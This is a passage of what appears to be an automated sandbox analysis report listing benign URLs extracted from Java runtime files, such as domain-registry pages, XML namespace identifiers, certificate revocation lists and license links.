Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.kr
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.kw
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.kz
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.la
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.lb
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.lc
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.li
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.local
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.ls
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.lt
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.ma
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.md
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.me
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.mh
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.mil
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.mk
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.ml
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.mm
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.mn
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.mobi
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.mq
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.mr
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.ms
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.mu
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.mv
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.nc.tr
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.ne
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.net
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.nf
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.nu
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.nz
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.om
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.org
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.pg
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.pr
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.ps
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.pw
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.rs
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.se
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.si
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.sk
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.sm
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.sn
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.sr
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.su
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.sy
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.sz
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.tc
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.td
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.tel
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.tf
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.tg
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.th
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.tk
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.tl
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.tn
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.to
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.tr
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.travel
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.tv
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.tw
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.tz
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.uk
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.us
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.va
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.vc
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.vg
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.vu
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.ws
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.zm
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.zw
Source: rt.jar.17.dr, jfxwebkit.dll.17.dr	String found in binary or memory: http://exslt.org/common
Source: rt.jar.17.dr	String found in binary or memory: http://exslt.org/common:nodeSet
Source: rt.jar.17.dr	String found in binary or memory: http://exslt.org/common:objectType
Source: rt.jar.17.dr	String found in binary or memory: http://exslt.org/dates-and-times
Source: rt.jar.17.dr	String found in binary or memory: http://exslt.org/math
Source: rt.jar.17.dr	String found in binary or memory: http://exslt.org/sets
Source: rt.jar.17.dr	String found in binary or memory: http://exslt.org/strings
Source: jfxrt.jar.17.dr	String found in binary or memory: http://gadao.gov.gu/registration.txt
Source: THIRDPARTYLICENSEREADME.txt.17.dr	String found in binary or memory: http://hg.openjdk.java.net/jdk8u/jdk8u/jdk/file/tip/src/share/native/sun/security/ec/impl
Source: jfxrt.jar.17.dr	String found in binary or memory: http://hoster.by/
Source: jfxrt.jar.17.dr	String found in binary or memory: http://icmregistry.com
Source: jfxrt.jar.17.dr	String found in binary or memory: http://index.museum/
Source: deploy.jar.17.dr	String found in binary or memory: http://java.com
Source: deploy.jar.17.dr	String found in binary or memory: http://java.com/access_old_java
Source: deploy.jar.17.dr	String found in binary or memory: http://java.com/download
Source: deploy.jar.17.dr	String found in binary or memory: http://java.com/en/download/faq/self_signed.xml
Source: deploy.dll.17.dr	String found in binary or memory: http://java.com/http://www.java.com/http://java.sun.com/OfferedSPCntSoftware
Source: npjp2.dll.17.dr, npdeployJava1.dll.17.dr, jp2launcher.exe.17.dr, jp2iexp.dll.17.dr	String found in binary or memory: http://java.com/inst-dl-redirect
Source: deployJava1.dll.17.dr	String found in binary or memory: http://java.com/inst-dl-redirectCOM
Source: npdeployJava1.dll.17.dr	String found in binary or memory: http://java.com/inst-dl-redirectNPRuntime
Source: deployJava1.dll.17.dr	String found in binary or memory: http://java.com/inst-dl-redirectS
Source: javaws.exe.17.dr	String found in binary or memory: http://java.com/inst-dl-redirectSP
Source: jp2iexp.dll.17.dr	String found in binary or memory: http://java.com/inst-dl-redirect_selflaunchjnlpembeddedWaitForMultipleObjects
Source: npjp2.dll.17.dr	String found in binary or memory: http://java.com/inst-dl-redirectopenS
Source: jp2iexp.dll.17.dr	String found in binary or memory: http://java.com/inst-dl-redirectopenS$
Source: jp2launcher.exe.17.dr	String found in binary or memory: http://java.com/inst-dl-redirectopendeploy.dllADVAPI32.dll
Source: deploy.jar.17.dr	String found in binary or memory: http://java.com/jcpsecurity
Source: eula.dll.17.dr	String found in binary or memory: http://java.com/license
Source: README.txt.17.dr	String found in binary or memory: http://java.com/licensereadme
Source: deploy.jar.17.dr	String found in binary or memory: http://java.com/nativesandbox
Source: deploy.jar.17.dr	String found in binary or memory: http://java.com/sitelistfaq
Source: java.exe, java.dll.17.dr	String found in binary or memory: http://java.oracle.com/
Source: java.exe	String found in binary or memory: http://java.sun.com/dtd/properties.dtd
Source: java.exe	String found in binary or memory: http://java.sun.com/dtd/properties.dtdam
Source: resources.jar.17.dr	String found in binary or memory: http://java.sun.com/j2se/1.6.0/docs/guide/standards/
Source: resources.jar.17.dr	String found in binary or memory: http://java.sun.com/j2se/1.6.0/docs/guide/standards/)
Source: resources.jar.17.dr	String found in binary or memory: http://java.sun.com/j2se/1.6.0/docs/guide/standards/).
Source: deploy.jar.17.dr	String found in binary or memory: http://java.sun.com/products/autodl/j2se
Source: jdwp.dll.17.dr	String found in binary or memory: http://java.sun.com/products/jpda
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://java.sun.com/xml/dom/properties/
Source: java.exe	String found in binary or memory: http://java.sun.com/xml/dom/properties/(
Source: java.exe	String found in binary or memory: http://java.sun.com/xml/dom/properties/;
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://java.sun.com/xml/dom/properties/ancestor-check
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://java.sun.com/xml/jaxp/properties/
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaLanguage
Source: rt.jar.17.dr	String found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaSource
Source: resources.jar.17.dr	String found in binary or memory: http://java.sun.com/xml/ns/metro/config
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://java.sun.com/xml/schema/features/
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://java.sun.com/xml/schema/features/report-ignored-element-content-whitespace
Source: java.exe	String found in binary or memory: http://java.sun.com/xml/schema/features/report-ignored-element-content-whitespace0
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://java.sun.com/xml/stream/properties/
Source: java.exe	String found in binary or memory: http://java.sun.com/xml/stream/properties//
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://java.sun.com/xml/stream/properties/ignore-external-dtd
Source: java.exe	String found in binary or memory: http://java.sun.com/xml/stream/properties/ignore-external-dtdrg/
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://java.sun.com/xml/stream/properties/reader-in-defined-state
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://java.sun.com/xml/stream/properties/report-cdata-event
Source: fxplugins.dll.17.dr	String found in binary or memory: http://javafx.com/
Source: fxplugins.dll.17.dr	String found in binary or memory: http://javafx.com/vp6decoderflvdemux
Source: deploy.jar.17.dr	String found in binary or memory: http://javaweb.sfbay.sun.com/~hj156752/awtless/fx/installer/fxinstaller.jnlp
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://javax.xml.XMLConstants/feature/secure-processing
Source: java.exe	String found in binary or memory: http://javax.xml.XMLConstants/feature/secure-processing-
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://javax.xml.XMLConstants/property/
Source: java.exe	String found in binary or memory: http://javax.xml.XMLConstants/property/3
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalDTD
Source: java.exe	String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalDTD;
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalSchema
Source: rt.jar.17.dr	String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalStylesheet
Source: rt.jar.17.dr	String found in binary or memory: http://javax.xml.transform.dom.DOMResult/feature
Source: rt.jar.17.dr	String found in binary or memory: http://javax.xml.transform.dom.DOMSource/feature
Source: rt.jar.17.dr	String found in binary or memory: http://javax.xml.transform.sax.SAXResult/feature
Source: rt.jar.17.dr	String found in binary or memory: http://javax.xml.transform.sax.SAXSource/feature
Source: jfr.jar.17.dr, rt.jar.17.dr	String found in binary or memory: http://javax.xml.transform.sax.SAXTransformerFactory/feature
Source: rt.jar.17.dr	String found in binary or memory: http://javax.xml.transform.sax.SAXTransformerFactory/feature/xmlfilter
Source: rt.jar.17.dr	String found in binary or memory: http://javax.xml.transform.stax.StAXResult/feature
Source: rt.jar.17.dr	String found in binary or memory: http://javax.xml.transform.stax.StAXSource/feature
Source: rt.jar.17.dr	String found in binary or memory: http://javax.xml.transform.stream.StreamResult/feature
Source: rt.jar.17.dr	String found in binary or memory: http://javax.xml.transform.stream.StreamSource/feature
Source: rt.jar.17.dr	String found in binary or memory: http://jax-ws.java.net/features/databinding
Source: jfxrt.jar.17.dr	String found in binary or memory: http://jprs.co.jp/en/jpdomain.html
Source: jfxrt.jar.17.dr	String found in binary or memory: http://jprs.jp/doc/rule/saisoku-1.html
Source: THIRDPARTYLICENSEREADME.txt.17.dr	String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: jfxrt.jar.17.dr	String found in binary or memory: http://nic.ae/english/arabicdomain/rules.jsp
Source: jfxrt.jar.17.dr	String found in binary or memory: http://nic.com.ai/
Source: jfxrt.jar.17.dr	String found in binary or memory: http://nic.gl
Source: jfxrt.jar.17.dr	String found in binary or memory: http://nic.lk
Source: jfxrt.jar.17.dr	String found in binary or memory: http://nic.tn
Source: java.exe	String found in binary or memory: http://null.sun.com/
Source: java.security.17.dr	String found in binary or memory: http://ocsp.example.net:80
Source: ssv.dll.17.dr, prism_sw.dll.17.dr, ktab.exe.17.dr, glass.dll.17.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: jfxrt.jar.17.dr	String found in binary or memory: http://online.dns.pt/dns/start_dns
Source: jvm.dll.17.dr	String found in binary or memory: http://openjdk.java.net/jeps/220).
Source: deploy.jar.17.dr	String found in binary or memory: http://oracle.com
Source: deploy.jar.17.dr	String found in binary or memory: http://oracle.com/bar/index.html
Source: deploy.jar.17.dr	String found in binary or memory: http://oracle.com/xyz/bar/index.html
Source: THIRDPARTYLICENSEREADME-JAVAFX.txt.17.dr	String found in binary or memory: http://oss.oracle.com/projects/gstreamer-mods/
Source: THIRDPARTYLICENSEREADME-JAVAFX.txt.17.dr	String found in binary or memory: http://oss.oracle.com/projects/webkit-java-mods/
Source: jfxrt.jar.17.dr	String found in binary or memory: http://pk5.pknic.net.pk/pk5/msgNamepk.PK
Source: java.exe	String found in binary or memory: http://policy.camerfirma.com
Source: java.exe, cacerts.17.dr	String found in binary or memory: http://policy.camerfirma.com0
Source: jfxrt.jar.17.dr	String found in binary or memory: http://psg.com/dns/gn/gn.txt
Source: jfxrt.jar.17.dr	String found in binary or memory: http://psg.com/dns/lr/lr.txt
Source: jfxrt.jar.17.dr	String found in binary or memory: http://psg.com/dns/ng/
Source: jfxrt.jar.17.dr	String found in binary or memory: http://registro.br/dominio/dpn.html
Source: jfxrt.jar.17.dr	String found in binary or memory: http://registro.nic.ve/nicve/registro/index.html
Source: jfxrt.jar.17.dr	String found in binary or memory: http://registry.gc.ca/en/SubdomainFAQ
Source: jfxrt.jar.17.dr	String found in binary or memory: http://registry.gy/
Source: THIRDPARTYLICENSEREADME.txt.17.dr	String found in binary or memory: http://relaxngcc.sf.net/).
Source: java.exe	String found in binary or memory: http://repository.swisssign.com/
Source: java.exe, cacerts.17.dr	String found in binary or memory: http://repository.swisssign.com/0
Source: ssv.dll.17.dr, prism_sw.dll.17.dr, ktab.exe.17.dr, glass.dll.17.dr	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: ssv.dll.17.dr, prism_sw.dll.17.dr, ktab.exe.17.dr, glass.dll.17.dr	String found in binary or memory: http://s2.symcb.com0
Source: jfxrt.jar.17.dr	String found in binary or memory: http://samoanic.ws/index.dhtml
Source: rt.jar.17.dr	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap/http
Source: ssv.dll.17.dr, prism_sw.dll.17.dr, ktab.exe.17.dr, glass.dll.17.dr	String found in binary or memory: http://sv.symcb.com/sv.crl0f
Source: ssv.dll.17.dr, prism_sw.dll.17.dr, ktab.exe.17.dr, glass.dll.17.dr	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: ssv.dll.17.dr, prism_sw.dll.17.dr, ktab.exe.17.dr, glass.dll.17.dr	String found in binary or memory: http://sv.symcd.com0&
Source: THIRDPARTYLICENSEREADME.txt.17.dr	String found in binary or memory: http://tartarus.org/~martin/PorterStemmer
Source: jfxrt.jar.17.dr	String found in binary or memory: http://tld.by/rules_2006_en.html
Source: jfxwebkit.dll.17.dr	String found in binary or memory: http://tools.ietf.org/html/rfc3986#section-2.1.
Source: java.exe	String found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl
Source: java.exe, cacerts.17.dr	String found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0
Source: ssv.dll.17.dr, prism_sw.dll.17.dr, ktab.exe.17.dr, glass.dll.17.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: ssv.dll.17.dr, prism_sw.dll.17.dr, ktab.exe.17.dr, glass.dll.17.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: ssv.dll.17.dr, prism_sw.dll.17.dr, ktab.exe.17.dr, glass.dll.17.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: THIRDPARTYLICENSEREADME.txt.17.dr	String found in binary or memory: http://upx.sourceforge.net/upx-license.html.
Source: THIRDPARTYLICENSEREADME.txt.17.dr	String found in binary or memory: http://upx.tsx.org
Source: jfxrt.jar.17.dr	String found in binary or memory: http://whois.ati.tn/
Source: jfxrt.jar.17.dr	String found in binary or memory: http://whois.nic.bi/
Source: THIRDPARTYLICENSEREADME.txt.17.dr	String found in binary or memory: http://wildsau.idv.uni-linz.ac.at/mfx/upx.html
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.aeda.ae/eng/aepolicy.php
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.afnic.fr/
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.afnic.fr/obtenir/chartes/nommage-fr/annexe-descriptifs
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.afnic.fr/obtenir/chartes/nommage-fr/annexe-sectoriels
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.afnic.re/obtenir/chartes/nommage-re/annexe-descriptifs
Source: rt.jar.17.dr	String found in binary or memory: http://www.alphaworks.ibm.com/formula/xml
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.anrt.ma/fr/admin/download/upload/file_fr782.pdf
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.antel.com.uy/
Source: rt.jar.17.dr	String found in binary or memory: http://www.apache.org
Source: THIRDPARTYLICENSEREADME.txt.17.dr	String found in binary or memory: http://www.apache.org/).
Source: THIRDPARTYLICENSEREADME.txt.17.dr	String found in binary or memory: http://www.apache.org/licenses/
Source: java.exe, THIRDPARTYLICENSEREADME.txt.17.dr	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.aucd.org.au/
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.belizenic.bz/
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.bermudanic.bm/dnr-text.txt
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.c.la/
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.cctld.nc/
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.cctld.ru/en/docs/rulesrf.php
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.cctld.ru/ru/docs/aktiv_8.php
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.centralnic.com/names/domains
Source: java.exe	String found in binary or memory: http://www.certplus.com/CRL/class2.crl
Source: java.exe, cacerts.17.dr	String found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: java.exe	String found in binary or memory: http://www.certplus.com/CRL/class3P.crl
Source: java.exe, cacerts.17.dr	String found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
Source: java.exe	String found in binary or memory: http://www.chambersign.org
Source: java.exe, cacerts.17.dr	String found in binary or memory: http://www.chambersign.org1
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.channelisles.net/applic/avextn.shtml
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.cmc.iq/english/iq/iqregister1.htm
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.co.pl
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.com.jm/register.html
Source: java.exe	String found in binary or memory: http://www.d-trust.net/crl/d-trust_root_class_3_ca_2_2009.crl
Source: java.exe, cacerts.17.dr	String found in binary or memory: http://www.d-trust.net/crl/d-trust_root_class_3_ca_2_2009.crl0
Source: java.exe	String found in binary or memory: http://www.d-trust.net/crl/d-trust_root_class_3_ca_2_ev_2009.crl
Source: java.exe, cacerts.17.dr	String found in binary or memory: http://www.d-trust.net/crl/d-trust_root_class_3_ca_2_ev_2009.crl0
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.dns.ao/REGISTR.DOC
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.dns.hr/documents/pdf/HRTLD-regulations.pdf
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.dns.jo/Registration_policy.aspx
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.dns.lu/en/
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.dns.pl/english/
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.dns.pl/english/dns-funk.html
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.dns.pl/english/dns-regiony.html
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.domain-registry.nl/ace.php/c
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.domain.hu/domain/English/sld.html
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.domain.kg/dmn_n.html
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.domaine.km/documents/charte.doc
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.domains.ph/FAQ2.asp
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.dot.kn/domainRules.html
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.dot.mp/
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.dotmasr.eg/
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.dyndns.com/services/dns/dyndns/
Source: THIRDPARTYLICENSEREADME.txt.17.dr	String found in binary or memory: http://www.ecma-international.org
Source: THIRDPARTYLICENSEREADME.txt.17.dr	String found in binary or memory: http://www.ecma-international.org/memento/codeofconduct.htm
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.eenet.ee/EENet/dom_reeglid.html#lisa_B
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.ert.gov.al/ert_alb/faq_det.html?Id=31
Source: THIRDPARTYLICENSEREADME.txt.17.dr	String found in binary or memory: http://www.freebxml.org/
Source: THIRDPARTYLICENSEREADME.txt.17.dr	String found in binary or memory: http://www.freebxml.org/).
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.gobin.info/domainname/bw.doc
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.gobin.info/domainname/formulaire-pf.pdf
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.gobin.info/domainname/ml-template.doc
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.gobin.info/domainname/mz-template.doc
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.gobin.info/domainname/sy.doc
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.gov.lt/index_en.php
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.government.pn/PnRegistry/policies.htm
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.gt/politicas.html
Source: jfxwebkit.dll.17.dr	String found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd
Source: jfxwebkit.dll.17.dr	String found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3C//DTD
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.ict.gov.qa/
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.icta.ky/da_ky_reg_dom.php
Source: snmp.acl.template.17.dr	String found in binary or memory: http://www.ietf.org/rfc/rfc2373.txt)
Source: resources.jar.17.dr	String found in binary or memory: http://www.ietf.org/rfc/rfc4051.txt
Source: gstreamer-lite.dll.17.dr	String found in binary or memory: http://www.ifpi.org/isrc/
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.info.at/
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.info.na/domain/
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.information.aero/index.php?id=66
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.inregistry.in/policies/
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.isnic.is/domain/rules.php
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.isoc.sd/sudanic.isoc.sd/billing_pricing.htm
Source: deploy.jar.17.dr	String found in binary or memory: http://www.java.com
Source: deploy.jar.17.dr	String found in binary or memory: http://www.java.com/jcpsecurity
Source: deploy.jar.17.dr	String found in binary or memory: http://www.java.com/jcpsecurity.
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.kcce.kp/en_index.php
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.kenic.or.ke/index.php?option=com_content&task=view&id=117&Itemid=145
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.ki/dns/index.html
Source: THIRDPARTYLICENSEREADME.txt.17.dr	String found in binary or memory: http://www.linuxnet.com
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.monic.net.mo/
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.mos.com.np/register.html
Source: ffjcext.zip.17.dr	String found in binary or memory: http://www.mozilla.org/2004/em-rdf#
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.mozilla.org/MPL/
Source: ffjcext.zip.17.dr	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.mptc.gov.kh/dns_registration.htm
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.mynic.net.my/
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.na-nic.com.na/
Source: deploy.jar.17.dr	String found in binary or memory: http://www.netscape.com/newsref/std/cookie_spec.html
Source: THIRDPARTYLICENSEREADME.txt.17.dr	String found in binary or memory: http://www.nexus.hu/upx
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.nic.af/help.jsp
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.nic.ag/prices.htm
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.nic.bo/
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.nic.bs/rules.html
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.nic.ci/index.php?page=charte
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.nic.cr/niccr_publico/showRegistroDominiosScreen.do
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.nic.ec/reg/paso1.asp
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.nic.gh/reg_now.php
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.nic.gi/rules.html
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.nic.gm/htmlpages%5Cgm-policy.htm
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.nic.gp/index.php?lang=en
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.nic.hn/politicas/ps02
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.nic.ht/info/charte.cfm
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.nic.io/rules.html
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.nic.ir/Internationalized_Domain_Names
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.nic.ir/Terms_and_Conditions_ir
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.nic.it/documenti/appendice-c.pdf
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.nic.it/documenti/regolamenti-e-linee-guida/regolamento-assegnazione-versione-6.0.pdf
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.nic.kz/rules/index.jsp
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.nic.lc/rules.htm
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.nic.lk/seclevpr.html
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.nic.lv/DNS/En/generic.php
Source: jfxrt.jar.17.dr	String found in binary or memory: http://www.nic.ly/regulations.php
